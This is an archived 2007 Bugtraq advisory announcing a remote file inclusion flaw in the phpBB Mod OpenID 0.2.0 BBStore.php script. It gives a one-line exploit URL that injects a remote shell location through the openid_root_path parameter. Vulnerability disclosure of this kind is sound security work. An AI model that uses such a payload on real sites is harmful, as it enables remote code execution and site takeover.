| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070930225047.675.qmail@securityfocus.com> Date: 30 Sep 2007 22:50:47 -0000 From: h3llcode@...mail.it To: bugtraq@...urityfocus.com Subject: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion +++++++++++++++++++++++++++++++++++++++++++++++++++ + + phpBB Mod OpenID 0.2.0 BBStore.php RFI + Risk: High + Found by Seph1roth + Site: http://blackroots.it + +++++++++++++++++++++++++++++++++++++++++++++++++++ + Vulnerable Script Download: http://sourceforge.net/project/showfiles.php?group_id=178846 + Exploit: http://www.victim.it/path/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=[Shell]
Powered by blists - more mailing lists